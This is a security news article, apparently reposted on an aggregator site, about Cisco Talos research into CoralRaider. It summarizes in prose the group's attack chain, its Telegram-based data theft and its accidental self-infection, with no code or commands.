Vietnamese Cybercrime Group CoralRaider Nets Financial Data

  /     /     /  
Publicated : 23/11/2024   Category : security


Vietnamese Cybercrime Group CoralRaider Nets Financial Data


With a complex attack chain and using Telegram for its command and control, CoralRaider targets victims in Asian countries — and appears to have accidentally infected itself as well.



A newcomer cybercrime group linked to Vietnam has targeted individuals and organizations in Asia, attempting to steal social media account information and user data.
CoralRaider, which first appeared in late 2023, relies heavily on social engineering and legitimate services for data exfiltration, and it develops custom tools for loading malware onto victim systems. Yet the group has also made some rookie mistakes, such as inadvertently infecting their own systems, which exposed their activities, threat researchers with Ciscos Talos threat intelligence group stated in a new analysis on CoralRaider.
While Vietnam has become increasingly active in cyber operations, this group does not appear to be working with the government, says Chetan Raghuprasad, security research technical leader for Ciscos Talos group.
The main priority is financial gain, and the actor is attempting to hijack the victim’s social media business and advertis[ing] accounts, he says. The potential exposure for follow-on attacks, including delivering other malware, is also possible. Our research has not seen any examples of other payloads being delivered.
Vietnam threat actors frequently focus on social media. The
infamous OceanLotus group
— also known as APT32 — has attacked other governments, dissidents, and journalists in Southeast Asian countries, including in Vietnam. A military-associated group, Force 47 — linked to the Vietnamese armys official television station —
regularly attempts to influence social media groups
.
CoralRaider, however, appears to be connected to profit motives rather than nationalist agendas.
At this moment, we do not have any evidence or information on signs of CoralRaider working with the Vietnamese government, Raghuprasad says.
A CoralRaider campaign typically starts with a Windows shortcut (.LNK) file, often using a .PDF extension in an attempt to fool the victim into opening the files,
according to the Cisco analysis
. Following that, the attackers move through a series of stages in their attack:
Windows shortcut downloads and executes an HTML application (HTA) file from an attacker-controlled server
HTA file executes an embedded Visual Basic script
VB script executes a PowerShell script, which then runs three more PowerShell scripts, including a series of anti-analysis checks to detect if the tool is running in a virtual machine, a bypass for the systems User Access Controls, and code that disables any notifications to the user
Final script runs RotBot, a loader that performs detection evasion, conducts reconnaissance on the system, and downloads a configuration file
RotBot then typically downloads XClient, which collects a variety of user data from the system, including social media account credentials
In addition to credentials, XClient also steals browser data, credit card account information, and other financial data. And lastly, XClient takes a screenshot of the victims desktop and uploads it.
Meanwhile, the researchers say there are indications that the attackers had targeted individuals in Vietnam as well.
The [XClient] stealer function maps the stolen victims information to hardcoded Vietnamese words and writes them to a text file on the victim machines temporary folder before exfiltration, the analysis stated. One example function we observed is used to steal the victims Facebook Ads account that has hardcoded with Vietnamese words for Account rights, Threshold, Spent, Time Zone, and Date Created.
The CoralRaider group used an automated bot on the Telegram service as a command-and-control channel and as well as to exfiltrate data from victims systems. However, the cybercriminal group appears to have infected one of their own machines, because the Cisco researchers discovered screenshots of the information posted to the channel.
Analyzing the images of the actors Desktop on the Telegram bot, we found a few Telegram groups in Vietnamese named Kiém tien tử Facebook, Mua Bán Scan MINI, and Mua Bán Scan Meta, Cisco Talos stated in the analysis. Monitoring these groups revealed that they were underground markets where, among other activities, victim data was traded.
CoralRaiders arrival on the cyber threat scene is not surprising: Vietnam is currently facing an increase in threats from account-stealing malware, says Sakshi Grover, research manager in IDCs Cybersecurity Services group for the Asia/Pacific region.
While historically less associated with cybercrime compared to other Asian nations, Vietnams rapid adoption of digital technologies has made it more susceptible to cyber threats, she says. Advanced persistent threats (APTs) are increasingly targeting government entities, critical infrastructure, and businesses, utilizing sophisticated techniques like custom malware and social engineering to infiltrate systems and steal sensitive data.
Because economic conditions vary across Vietnam — with some areas experiencing limited job opportunities, resulting in low wages for highly skilled roles — individuals can be incentivized to engage in cybercrime to make money, Grover says.

Last News

▸ Hack Your Hotel Room ◂
Discovered: 23/12/2024
Category: security

▸ Website hacks happened during World Cup final. ◂
Discovered: 23/12/2024
Category: security

▸ Criminal Possession of Government-Grade Stealth Malware ◂
Discovered: 23/12/2024
Category: security


Cyber Security Categories
Google Dorks Database
Exploits Vulnerability
Exploit Shellcodes

CVE List
Tools/Apps
News/Aarticles

Phishing Database
Deepfake Detection
Trends/Statistics & Live Infos



Tags:
Vietnamese Cybercrime Group CoralRaider Nets Financial Data